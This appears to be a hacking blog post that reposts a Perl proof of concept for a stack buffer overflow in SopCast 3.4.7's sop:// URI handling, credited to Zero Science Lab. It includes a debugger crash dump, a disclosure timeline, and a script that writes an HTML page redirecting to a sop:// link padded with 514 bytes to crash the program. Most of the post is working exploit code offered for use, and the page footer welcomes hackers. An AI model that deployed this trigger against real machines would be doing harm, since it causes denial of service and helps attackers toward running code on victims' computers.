RSS Feed  Twitter

SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC

Posted by Nehul Agrawal
Labels: , , 0 comments
#!/usr/bin/perl
# SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC
# Vendor: SopCast.com
# Product web page: http://www.sopcast.com
# Affected version: 3.4.7.45585
#
# Summary: SopCast is a simple, free way to broadcast video and audio or watch
# the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer)
# technology, It is very efficient and easy to use. SoP is the abbreviation for
# Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based
# on P2P. The core is the communication protocol produced by Sopcast Team, which
# is named sop://, or SoP technology.
#
# Desc: SopCast suffers from a stack-based buffer overflow vulnerability when
# parsing the user input using the SoP protocol in sopocx.ocx module allowing
# the attacker to gain system access and execute arbitrary code on the affected
# machine. The issue is triggered when adding 514 bytes of string to the sop://
# protocol (GET), causing the app to open the link (channel) and crashing. The
# application will crash even with 'sop://[anything]' because it fails to properly
# sanitize and handle the uri segment, but with exactly 514 bytes the stack gets
# overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes
# denial of service scenario. You can also edit the '<address>' element in the
# favorites.xml file as the attack vector.
#
#
# ================================================================================
#
# (e50.fcc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=01092f48 ebx=00f8e8e8 ecx=000000b7 edx=0116a7dc esi=00000001 edi=0104af88
# eip=100a350f esp=0618febc ebp=0618ffa8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# *** WARNING: Unable to verify checksum for C:\PROGRA~1\SopCast\sopocx.ocx
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\SopCast\sopocx.ocx -
# sopocx!DllUnregisterServer+0x9217f:
# 100a350f 0fb606          movzx   eax,byte ptr [esi]         ds:0023:00000001=??
# ...
# 0:000> d esp+400
# 0012ea78  18 10 ea 00 73 00 6f 00-70 00 3a 00 2f 00 2f 00  ....s.o.p.:././.
# 0012ea88  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012ea98  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eaa8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eab8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eac8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012ead8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eae8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# ...
# 0:008> d edx+1000
# 00f2f8b0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8c0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8d0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8e0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8f0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f900  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f910  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f920  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0:008> d eax+2000
# 00f320e8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f320f8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32108  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32118  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32128  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32138  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32148  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32158  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
#
# ================================================================================
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [30.11.2011] Vulnerability discovered.
# [01.12.2011] Contact with the vendor with sent detailed info.
# [04.12.2011] No response from the vendor.
# [05.12.2011] Public security advisory released.
#
#
# Advisory ID: ZSL-2011-5063
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5063.php
#
#
# 30.11.2011
#
use strict;
  
my $fname = "thricer.html";
print "\n\nooooooooooooooooooooooooooooooooooooooooooooooooo\no"." "x47 ."o\n";
print "o\tSopCast 3.4.7 URI Handling BoF PoC" . " "x6 . "o\no"." "x47 ."o\no\t\t";
print "ID: ZSL-2011-5063"." "x15 ."o\no"." "x47 ."o\n";
print "o\tCopyleft (c) 2011, Zero Science Lab"." "x5 ."o\no"." "x47 ."o\n";
print "ooooooooooooooooooooooooooooooooooooooooooooooooo\n\n";
my $curiosity = "\n</center>\n</body>\n</html>";
my $unknown = "<form>\n<input type=\"button\" value=\"Push The Button!\" ";
my $with = "onclick=\"exploit()\" />" . "\n</form>";
my $of = "<body bgcolor=\"#002233\">\n<br /><br />\n<center>\n";
my $fear = "</script>\n</head>\n";
my $replace = "<html>\n<head>\n<title>".
              "SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer".
              " Overflow PoC</title>\n".
              "<script type=\"text/javascript\">\n";
my $code = "window.location.href = \"sop://"."A"x514 ."\";\n";
my $the = "function exploit()\n{\n" . $code . "}\n";
my $payload = $replace.$the.$fear.$of.$unknown.$with.$curiosity;
  
print "\n\n[*] Creating $fname file...\n";
open ENOUGH, ">./$fname" || die "\nCan't open $fname: $!";
print ENOUGH $payload; print "\n"; sleep 1;
print "\n[.] File successfully scripted!\n\n";
close ENOUGH;

0 Response to "SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC"

Post a Comment

Subscribe to: Post Comments (Atom)

Number

    CrackRuleShare

    Content on this page requires a newer version of Adobe Flash Player.

    Get Adobe Flash player

    Blog Archive

    Info

    Crack Rule - Find me on Bloggers.com decatrim Free Backlinks
    Free Automatic Google Backlinks - SEOforum backlinksFree Automatic Backlink Service Malaysia Free Backlink ServicesFree Promotion LinkFree Smart Automatic BacklinkMAJLIS LINK: Do Follow BacklinkLink Portal Teks TVAutoBacklinkGratisjapanese instant free backlink Free Plugboard Link Banner Button Free Smart Automatic BacklinkMalaysia Free Backlink Services Free Promotion LinkMAJLIS LINK: Do Follow BacklinkLink Portal Teks TVAutoBacklinkGratisjapanese instant free backlink Free Plugboard Link Banner ButtonFree Automatic Backlink ServiceFree BacklinksCrack Rule - Find me on Bloggers.comENFORUM WEB DIRECTORYWeb Directories 2AddLink Web Link DirectoryWebsite Directory - Free Link Submission Life Experience Degrees
    Web DirectoriesFree Automatic Backlink
Powered by Blog templates
HostGator Promo Code
Free Automatic Link Crack Rule All the hackers are Welcome. Please contribute your support to make this blog one of the top latest hacking trick adda. Free Backlinks Web Directories